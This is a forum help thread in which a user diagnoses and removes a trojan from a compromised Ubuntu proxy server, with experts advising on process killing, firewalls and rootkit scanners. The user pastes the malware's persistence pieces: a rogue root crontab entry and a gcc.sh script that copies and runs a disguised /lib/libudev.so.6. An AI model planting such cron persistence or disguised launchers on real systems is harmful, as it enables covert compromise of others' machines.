Solved

I think my Ubuntu 12.10 box is hacked, but not sure...

Posted on 2016-12-01
13
52 Views
Last Modified: 2016-12-02
Hi,

Im not a Linux dude, so Im using google to find solutions, but I cant find a solution for this matter...
It seems that our Ubuntu 12.10 proxy server is running some unwanted activities nor services..

When I use TOP command, it shows the below line on top and I cant find the command jekakdaokt on google.

PID  USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
1313 root      20   0 44796 2880  204 S  72,9  0,0  53779:35 jekakdaokt

anyone that want to help me out to see if my box is compromised?

Ive changed root password and started with a new proxy server by using Ubuntu 16.04, but not done yet..
0
Comment
Question by:Bjarte Fjelland
  • 7
  • 5
13 Comments
 
LVL 6

Expert Comment

by:Raghav
ID: 41908505
The very first thing you can do is check / enable firewall "ufw"

1. To check the ufw service status, run -

sudo service status ufw

2. If you have not installed ufw, then run -

sudo apt-get install ufw

Kill the process 1313 and check if it returns.

sudo kill 1313

Good Luck.

--Raghav.
0
 
LVL 1

Author Comment

by:Bjarte Fjelland
ID: 41908513
Hi Raghav,

When doing -> sodu service status ufw <- I've got that the service is unknown.
Doing -> sudo apt-get install ufw <- I've got that the package cant be installed.

After sudo kill 1313 the blow line started:

  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
25876 root      20   0 28692 3540  196 S  18,0  0,0   0:04.74 uplxdzsnsk

It do seems like there is an unwanted service running.
0
 
LVL 6

Expert Comment

by:Raghav
ID: 41908524
what error did you get when you try to install ufw?

--Raghav.
0
 
LVL 6

Expert Comment

by:Raghav
ID: 41908535
Also try to kill the process using -

sudo kill -STOP 25876

Check your crontab if it triggers from there.

--Raghav.
0
 
LVL 6

Accepted Solution

by:
Raghav earned 500 total points
ID: 41908541
0
 
LVL 1

Author Comment

by:Bjarte Fjelland
ID: 41908653
In the crontab:

# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user      command
17 *      * * *      root    cd / && run-parts --report /etc/cron.hourly
25 6      * * *      root      test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6      * * 7      root      test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6      1 * *      root      test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/3 * * * * root /etc/cron.hourly/gcc.sh

in mtab:

/dev/mapper/proxy-root / ext4 rw,errors=remount-ro 0 0
proc /proc proc rw,noexec,nosuid,nodev 0 0
sysfs /sys sysfs rw,noexec,nosuid,nodev 0 0
none /sys/fs/fuse/connections fusectl rw 0 0
none /sys/kernel/debug debugfs rw 0 0
none /sys/kernel/security securityfs rw 0 0
udev /dev devtmpfs rw,mode=0755 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=0620 0 0
tmpfs /run tmpfs rw,noexec,nosuid,size=10%,mode=0755 0 0
none /run/lock tmpfs rw,noexec,nosuid,nodev,size=5242880 0 0
none /run/shm tmpfs rw,nosuid,nodev 0 0
none /run/user tmpfs rw,noexec,nosuid,nodev,size=104857600,mode=0755 0 0
/dev/sda1 /boot ext2 rw 0 0

in gcc.sh:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

When I Killed with -STOP the process and this apears:

32456 root      20   0 35192 1008  208 S   0,3  0,0  58:39.73 vcyanolhsgcje
0
Ransomware-A Revenue Bonanza for Service Providers

Ransomware – malware that gets on your customers’ computers, encrypts their data, and extorts a hefty ransom for the decryption keys – is a surging new threat.  The purpose of this eBook is to educate the reader about ransomware attacks.

 
LVL 6

Expert Comment

by:Raghav
ID: 41908684
0
 
LVL 1

Author Comment

by:Bjarte Fjelland
ID: 41908956
I've done the steps in the URL, now rebooting.

This is a squid proxy server with 2 nic, one for internal and other for external. I can see that SSH and port 80 is open from the Internet and I want to close it cos it seems that the malware came via SSH.
Could I close it for external nic and open for the internal nic?
0
 
LVL 1

Author Comment

by:Bjarte Fjelland
ID: 41908971
I think the malware is gone, but how can I be sure?
I cant see any weird command names when running TOP.

But can see SSHD and mysqld is runnning occasionally.
0
 
LVL 6

Expert Comment

by:Raghav
ID: 41909022
Always use a firewall to block unwanted ports and allow only trusted ones. ANY - ANY rule can be dangerous. Restrict access from outside to only trusted hosts if you need to.

Good to hear that the malware process is gone.

--Raghav.
0
 
LVL 28

Expert Comment

by:serialband
ID: 41909194
Since you're not that familiar with Linux, download and install a rootkit scanner.
http://www.chkrootkit.org/
http://rkhunter.sourceforge.net/

Are you using MySQL or SSH for anything?  If not you can turn it off.
service sshd stop
killall sshd
service mysql stop
service status all


If you need to use them, then you should block external sites and only allow specific internal IPs to access your system.
If you've installed ufw, then you can set it to only allow access to ssh port 22 on the local subnet.
If your local subnet is 10.1.1.0 to 10.1.1.255 then:
sudo ufw allow from 10.1.1.0/24 to any port 22
0
 
LVL 1

Author Closing Comment

by:Bjarte Fjelland
ID: 41909867
The link Raghav refers to remove the trojan on the Ubuntu 12.10 box, thanks !
I also see that I need to replace the box with newer Ubuntu version and put up a UFW or iptables.
I cant install any program on it for some reason unknown to me.

Thanks again Raghav!
0
 
LVL 6

Expert Comment

by:Raghav
ID: 41909893
You are most welcome.

--Raghav.
0

Featured Post

U.S. Department of Agriculture and Acronis Access

With the new era of mobile computing, smartphones and tablets, wireless communications and cloud services, the USDA sought to take advantage of a mobilized workforce and the blurring lines between personal and corporate computing resources.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
gdb doesn't stop on breakpoint 2 50
Google script to get long/lat from address 10 65
php ssh2_scp_send 1 48
Adding more CPU cores to a Linux VM 5 61
Daily system administration tasks often require administrators to connect remote systems. But allowing these remote systems to accept passwords makes these systems vulnerable to the risk of brute-force password guessing attacks. Furthermore there ar…
Linux users are sometimes dumbfounded by the severe lack of documentation on a topic. Sometimes, the documentation is copious, but other times, you end up with some obscure "it varies depending on your distribution" over and over when searching for …
Connecting to an Amazon Linux EC2 Instance from Windows Using PuTTY.
Many of my clients call in with monstrous Gmail overloading issues with Outlook. A quick tip is to turn off the All Mail and Important folders from synching. Here is a quick video I made to show you how to turn off these and other folders in Gmail s…

910 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

21 Experts available now in Live!

Get 1:1 Help Now